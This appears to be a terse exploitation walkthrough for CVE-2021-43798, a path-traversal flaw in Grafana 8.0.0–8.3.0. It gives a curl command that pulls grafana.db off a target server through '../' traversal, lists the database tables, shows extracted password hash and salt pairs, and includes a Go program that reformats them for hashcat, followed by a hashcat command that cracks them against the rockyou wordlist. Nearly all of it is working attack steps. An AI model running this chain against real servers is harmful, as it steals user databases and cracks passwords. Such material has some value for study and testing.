CVE-2021-43798

Grafana 8.0.0 - 8.3.0

$ curl -o grafana.db --path-as-is http://10.9.49.22:3000/public/plugins/welcome/../../../../../../../../var/lib/grafana/grafana.db
$ sqlite3 grafana.db
SQLite version 3.31.1 2020-01-27 19:55:54
Enter ".help" for usage hints.
sqlite> .tables
alert                       login_attempt            
alert_configuration         migration_log            
alert_instance              ngalert_configuration    
alert_notification          org                      
alert_notification_state    org_user                 
alert_rule                  playlist                 
alert_rule_tag              playlist_item            
alert_rule_version          plugin_setting           
annotation                  preferences              
annotation_tag              quota                    
api_key                     server_lock              
cache_data                  session                  
dashboard                   short_url                
dashboard_acl               star                     
dashboard_provisioning      tag                      
dashboard_snapshot          team                     
dashboard_tag               team_member              
dashboard_version           temp_user                
data_source                 test_data                
kv_store                    user                     
library_element             user_auth                
library_element_connection  user_auth_token

create file passwordsalt.txt

e21680070fb3a72d8cac29819eb74ddbee669a9d362dea5c4674d8287e4a1df22424fcdd00ab0cc8230d4249296adc2adca8|NcgfTdzwPc
18e6160a5e7e03a7dea259195b27543c2d1b515e4490867c73ffb6214d08f77163ecc0f58321a40deb300ec563c15a327733|13CdHYK4Xl
20ae2e2828c004ef4638f6d490a23aa9956cc4bfeb1db60abd18930f97099782037c6861518b466e20addc36dfda5f564d78|bhhVgTns9o

grafana-hashcat.go

create file grafana-hashcat.go

package main

import (
	"bufio"
	"encoding/base64"
	"encoding/hex"
	"fmt"
	"os"
	"strings"
)

func tohashes(password, salt string) string {
	passwordBytes, err := hex.DecodeString(password)
	if err != nil {
		return fmt.Sprintf("Error decoding hex: %v", err)
	}
	passwordBase64 := base64.StdEncoding.EncodeToString(passwordBytes)
	saltBase64 := base64.StdEncoding.EncodeToString([]byte(salt))
	return fmt.Sprintf("sha256:10000:%s:%s", saltBase64, passwordBase64)
}

func main() {
	file, err := os.Open("passwordsalt.txt")
	if err != nil {
		fmt.Println("Error opening file:", err)
		return
	}
	defer file.Close()

	scanner := bufio.NewScanner(file)
	for scanner.Scan() {
		line := scanner.Text()
		parts := strings.Split(line, "|")
		if len(parts) != 2 {
			fmt.Println("Invalid line:", line)
			continue
		}
		fmt.Println(tohashes(parts[0], parts[1]))
	}

	if err := scanner.Err(); err != nil {
		fmt.Println("Error reading file:", err)
	}
}

RUN

> go run .\grafana-hashcat.go
sha256:10000:TmNnZlRkendQYw==:4haABw+zpy2MrCmBnrdN2+5mmp02LepcRnTYKH5KHfIkJPzdAKsMyCMNQkkpatwq3Kg=
sha256:10000:MTNDZEhZSzRYbA==:GOYWCl5+A6feolkZWydUPC0bUV5EkIZ8c/+2IU0I93Fj7MD1gyGkDeswDsVjwVoydzM=
sha256:10000:YmhoVmdUbnM5bw==:IK4uKCjABO9GOPbUkKI6qZVsxL/rHbYKvRiTD5cJl4IDfGhhUYtGbiCt3Dbf2l9WTXg=

hashcat

> hashcat.exe -m 10900 hashes.txt rockyou.txt -o o.txt

参考: https://vulncheck.com/blog/grafana-cve-2021-43798